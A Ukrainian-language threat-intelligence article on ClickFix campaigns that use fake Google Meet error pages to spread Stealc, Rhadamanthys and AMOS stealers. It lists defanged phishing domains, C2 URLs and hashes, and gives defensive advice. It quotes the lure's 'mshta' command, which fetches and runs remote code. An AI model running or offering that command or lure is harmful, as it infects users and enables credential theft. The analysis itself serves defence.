Дізнайтесь, як сучасна тактика соціальної інженерії ClickFix використовує підроблені сторінки відеоконференцій Google Meet для поширення шкідливого ПЗ серед користувачів Windows та macOS. Розкриваємо подробиці атак ClickFix, які зловмисники використовують через фейкові повідомлення про помилки, щоб обманути користувачів.
У травні 2024 року виявили нову тактику соціальної інженерії під назвою ClickFix, що пов’язана з кластером ClearFake, ретельно відстежуваним командою Sekoia Threat Detection & Research (TDR) у приватному звіті FLINT 2024-027. Цей новий варіант ClearFake використовує PowerShell і буфер обміну для зараження систем. Тактика передбачає показ підроблених повідомлень про помилки в браузерах, аби змусити користувачів копіювати та запускати шкідливий PowerShell-код, що в результаті призводить до інфікування їхніх пристроїв.
За даними дослідників Proofpoint, які назвали цю тактику ClickFix, брокер початкового доступу TA571 застосовував її у фішингових кампаніях з березня 2024 року. Зазвичай кампанії використовували HTML-файли, масковані під документи Word, що відображали підроблене вікно з помилкою. Це спонукало користувачів встановлювати шкідливе ПЗ, таке як Matanbuchus, DarkGate або NetSupport RAT, через PowerShell-скрипти.
Протягом останніх місяців тактика ClickFix застосовувалася в численних кампаніях, спрямованих на поширення інфостилерів для Windows і macOS, ботнетів і засобів віддаленого доступу. Ця тенденція відповідає методам розповсюдження шкідливого ПЗ через так званий метод “drive-by” завантаження. Аналітики Sekoia підкреслюють, що низка кіберзлочинних угруповань почала активно використовувати цей підхід, щоб уникати антивірусних сканувань та заходів безпеки браузера, що підвищує ефективність зараження.
У статті наведено хронологію спостережень щодо кампаній ClickFix, а також технічні деталі кластера ClickFix, що використовує підроблені сторінки відеоконференцій Google Meet для поширення інфостилерів, націлених на Windows і macOS. Аналітики Sekoia пов’язують цей кластер, що імітує Google Meet, із двома кіберзлочинними угрупованнями: “Slavic Nation Empire (SNE)” та “Scamquerteo”, які є підрозділами команд із шахрайства в криптовалютній сфері “Marko Polo” та “CryptoLove” відповідно.
Ось кілька прикладів шкідливих веб-сайтів, які видають себе за Google Chrome, Facebook, PDFSimpli та reCAPTCHA, використовуючи тактику соціальної інженерії ClickFix.
Незважаючи на те, що багато кампаній ClickFix спрямовані на широке охоплення кількох секторів, використовуючи скомпрометовані веб-сайти ClearFake та масові фішингові атаки, деякі з них спеціально орієнтовані на конкретні галузі.
Наприклад, Proofpoint ідентифікував кластери ClickFix, спрямовані на транспортні та логістичні компанії в Північній Америці у період із травня по серпень 2024 року. У цих кампаніях використовувалися веб-сайти, що імітували програмне забезпечення для керування транспортом і автопарком, аби досягти більш цільового впливу.
Крім того, кампанія на платформі GitHub була орієнтована здебільшого на розробників. Вона поширювала Lumma Stealer через фальшиві сповіщення про вразливості, використовуючи довіру розробників до повідомлень від GitHub. Ця широкомасштабна операція, ймовірно, мала на меті зібрати значний обсяг конфіденційних даних розробників, які можуть стати основою для більш прицільних атак у майбутньому.
Нещодавні кампанії, виявлені аналітиками Sekoia, демонструють тенденцію до постійного націлювання як на компанії, так і на окремих користувачів, використовуючи різноманітні методи залучення, такі як підроблені сторінки Google Meet і фейкові групи на Facebook.
Аналізуючи текстові елементи у повідомленнях ClickFix, такі як «Натисніть комбінацію клавіш» або «CTRL+V», було виявлено декілька веб-сайтів, що маскуються під головну сторінку Google Meet для відеоконференцій. На цих сайтах з’являлися спливаючі вікна з хибними повідомленнями про проблеми з мікрофоном або гарнітурою, як показано на наступному зображенні.
Було визначено перелік доменних імен та IP-адрес, які з високою ймовірністю пов’язані з цим кластером:
meet[.]google[.]us-join[.]com meet[.]googie[.]com-join[.]us meet[.]google[.]com-join[.]us meet[.]google[.]web-join[.]com meet[.]google[.]webjoining[.]com meet[.]google[.]cdm-join[.]us meet[.]google[.]us07host[.]com googiedrivers[.]com 77.221.157[.]170
Фішингові URL-адреси імітують законні з однаковим шаблоном для ідентифікатора зустрічі, наприклад:
hxxps://meet[.]google[.]com-join[.]us/wmq-qcdn-orj hxxps://meet[.]google[.]us-join[.]com/ywk-batf-sfh hxxps://meet[.]google[.]us07host[.]com/coc-btru-ays hxxps://meet[.]google[.]webjoining[.]com/exw-jfaj-hpa
Для користувачів Windows натискання кнопки «Спробувати виправити» призводить до копіювання такої команди в буфер обміну:
mshta hxxps://googIedrivers[.]com/fix-error
Після виконання сценарій VBS виконує такі дії:
Він завершує свій батьківський процес ( mshta.exe ).
Він завантажує два виконувані файли ( stealc.exe і ram.exe ) за допомогою bitsadmin. Після двосекундної затримки він сповіщає сервер C2 ( webapizmland[.]com ) про успішне або невдале виконання виконуваних файлів.
Він отримує загальнодоступну IP-адресу жертви за допомогою служби api.ipify[.]org і надсилає її на сервер C2 разом зі статусом виконання.
Два виконуваних файли, stealc.exe (SHA256: a834be6d2bec10f39019606451b507742b7e87ac8d19dc0643ae58df183f773c) і ram.exe (SHA256: 2853a61188b4446be57543858adcc704e8534326d4d84ac44a60743b1a44cbfe), є корисними навантаженнями Stealc і Rhadamanthys відповідно. Обидва файли захищені шифрувальником HijackLoader.
У цій кампанії сервер управління Stealc (C2) має адресу «hxxp://95.182.97[.]58/84b7b6f977dd1c65.php», а сервер управління Rhadamanthys (C2) розташований за адресою «hxxp://91.103.140[.]200:9078/3936a074a2f65761a5eb8/6fmfpmi7.fwf4p». Обидві IP-адреси вже внесені в базу даних CTI в результаті моніторингу Sekoia.io C2 Trackers, оскільки ми активно відстежуємо інфраструктуру управління (C2) для цих двох сімейств інфостилерів, які поширюються за моделлю «шкідливе ПЗ як послуга».
Примітно, що назва ботнету Stealc, «sneprivate24», вказує на зв’язок із групою траферів «Slavic Nation Empire (SNE)». Додаткові деталі про цей зв’язок представлені в розділі «Команди пересилачів, які керують цим кластером ClickFix».
Для користувачів macOS натискання кнопки “Try Fix” ініціює завантаження файлу Launcher_v1.94.dmg (SHA256: 94379fa0a97cc2ecd8d5514d0b46c65b0d46ff9bb8d5a4a29cf55a473da550d5) за допомогою наступних HTTP-запитів:
Запит GET до hxxps://carolinejuskus[.]com/kusaka.php?call=launcher , де сервер відповідає другою URL-адресою в HTTP-заголовку Location.
Запит GET до hxxps://carolinejuskus[.]com/f9dfbcf6a999/7cc2f5dc3c76/load.51f8527e20dcb05ffd8586b853937a8a.php?call=launcher , який повертає зловмисне корисне навантаження.
Було ідентифіковано, що корисне навантаження Launcher_v1.94.dmg (SHA256: 94379fa0a97cc2ecd8d5514d0b46c65b0d46ff9bb8d5a4a29cf55a473da550d5) є AMOS Stealer, який взаємодіє зі своїм сервером управління (C2) за адресою «hxxp://85.209.11[.]155/joinsystem».
Sekoia здійснює активний моніторинг цієї інфраструктури, зокрема за кінцевою точкою /kusaka.php. З травня 2024 року ця кінцева точка застосовується в кампаніях, де користувачів перенаправляють із шкідливих веб-сайтів для завантаження AMOS Stealer. Ймовірно, кінцева точка використовується для захисту корисного навантаження від небажаного трафіку, такого як автоматизовані завантаження ботами або сканування антивірусними продуктами.
Визначено наступні доменні імена, пов’язані з цією інфраструктурою для розповсюдження шкідливого ПЗ на macOS:
alienmanfc6[.]com apunanwu[.]com bowerchalke[.]com carolinejuskus[.]com cautrucanhtuan[.]com cphoops[.]com dekhke[.]com iloanshop[.]com kansaskollection[.]com lirelasuisse[.]com mdalies[.]com mensadvancega[.]com mishapagerealty[.]com modoodeul[.]com pabloarruda[.]com pakoyayinlari[.]com patrickcateman[.]com phperl[.]com stonance[.]com utv4fun[.]com
Зважаючи на різноманітність шкідливих веб-сайтів, які переспрямовують на цю інфраструктуру, є висока ймовірність, що вона використовується кількома суб’єктами загрози. Вони, схоже, об’єднані в централізовану команду передачі даних, що співпрацює для спільного використання ресурсів, зокрема інфраструктури і AMOS Stealer, який також продається за моделлю «шкідливе ПЗ як послуга».
Slavic Nation Empire (SNE) – підгрупа Марко Поло
Сервер зловмисника містить цікавий код JavaScript за адресою hxxp://77.221.157[.]170:3004/server.js, що пов’язаний із цією інфраструктурою розповсюдження. Цей JavaScript підключається до бази даних MongoDB для отримання інформації про «працівника» і надсилає статистику двом Telegram-ботам у випадках, коли користувачі відвідують підроблені веб-сайти Google Meet та успішно завантажують корисне навантаження. Команда висловлює вдячність дослідникові кібербезпеки Каролу Пачіореку з CSIRT KNF за допомогу у цьому відкритті.
Нижче наведено фрагмент коду JavaScript, який демонструє повідомлення, що надсилається двом Telegram-ботам:
Кіберзлочинці часто використовують ботів Telegram для моніторингу своєї діяльності, особливо коли це передбачає роботу в команді та співпрацю з афілійованими особами (трейдерами/воркерами).
На основі аналізу діяльності цього кластера та повідомлень, які передаються між суб’єктами загрози, які його діють і використовують, аналітики Sekoia висувають таку гіпотезу:
Зловмисник sparkhash розгорнув кластер GMeet на користь команди передачі « Slavic Nation Empire (SNE) » , відповідальної за генерування трафіку до цього кластера.
Цією командою розповсюджувачів міг би керувати загрозливий актор Alexmen , який контролює діяльність кластерів розповсюдження та, можливо, керує ліцензіями розкрадачів інформації, покладаючись на зовнішні служби.
Передачі , також відомі як афілійовані особи або працівники, поширюють шкідливі URL-адреси потенційним жертвам, перенаправляючи їх до цього кластера . Наприклад, кіберзлочинець під назвою web3huntereth міг заразити жертву або себе під час тесту в Польщі, як вказує статистика завантажень бота Telegram.
Обидві команди траферів, « Slavic Nation Empire (SNE) » і « Scamquerteo », використовують той самий шаблон ClickFix , який імітує Google Meet. Це відкриття свідчить про те, що ці команди обмінюються матеріалами , також відомими як «проект посадки», а також інфраструктурою .
Аналітики Sekoia оцінюють із середньою впевненістю, що обидві команди використовують один і той же сервіс боротьби з кіберзлочинністю, щоб надати їм цей підроблений кластер Google Meet , який залишається невідомим на момент написання статті. Крім того, ймовірно, що третя сторона керує їхньою інфраструктурою або реєструє їхні доменні імена.
ClickFix — це нова тактика соціальної інженерії, вперше зафіксована у 2024 році. Станом на вересень 2024 року кілька вторгнень вже застосували цю тактику для широкомасштабного поширення шкідливого програмного забезпечення через фішингові електронні листи, зламані веб-сайти та інші інфраструктури розповсюдження.
ClickFix вводить користувачів в оману, змушуючи їх завантажувати та запускати зловмисне програмне забезпечення на своїх пристроях без необхідності використовувати веб-браузер для ручного завантаження чи виконання файлу. Це дозволяє обійти функції безпеки браузера, такі як Google Safe Browsing, і виглядати менш підозріло для користувачів, включаючи корпоративних та індивідуальних.
Аналізований кластер ClickFix використовує приманку, яка може бути особливо руйнівною в кампаніях, націлених на організації, що використовують Google Workspace, особливо Google Meet. Розслідування траферів, які розповсюджують цей кластер, показало, що основними цілями є користувачі криптовалютних активів, додатків Web3, децентралізованих фінансів та NFT. Вважається, що подібні методи соціальної інженерії можуть бути використані й в інших кампаніях для поширення зловмисного ПЗ.
1. Загальні правила:
– Перевірте URL-адреси: завжди звертайте увагу на адресу веб-сайту. Офіційні домени Google завжди закінчуються на .google.com. Наприклад: meet.google.com, а не google.web-join.com.
– Не копіюйте коди з підозрілих сайтів: жодна авторитетна служба не попросить вас скопіювати та запустити код у PowerShell або в терміналі.
– Ігноруйте спливаючі повідомлення: якщо ви бачите спливаюче повідомлення з помилкою, якої ви не очікували, закрийте браузер і проскануйте систему на наявність шкідливих програм.
2. Використання технічних засобів захисту:
– Захист від шкідливого програмного забезпечення: вимкніть автоматичне виконання сценаріїв, таких як PowerShell, для невідомих джерел.
– Увімкніть захист від фішингу в браузерах, наприклад Google Safe Browsing.
3. Розпізнавання ознак соціальної інженерії:
– Перевірка повідомлень: якщо система видає незвичайну помилку, не вживайте заходів, поки не перевірите її достовірність на офіційному сайті сервісу.
– Аналіз логіки: законні служби не пропонуватимуть «виправити проблему», пропонуючи запустити файл або команду без пояснень.
4. Захист на рівні організацій:
– Навчання співробітників: розробіть програму навчання співробітників, яка включає розпізнавання фішингових атак і методи соціальної інженерії.
– Моніторинг мережі: встановіть системи виявлення загроз (IDS/IPS), які можуть блокувати підозрілі домени.
– Відстежуйте інфраструктуру на наявність незвичайної активності.
Дисклеймер
Ця стаття створена з єдиною метою — підвищити обізнаність про шахрайські методи та забезпечити читачів інструментами для захисту.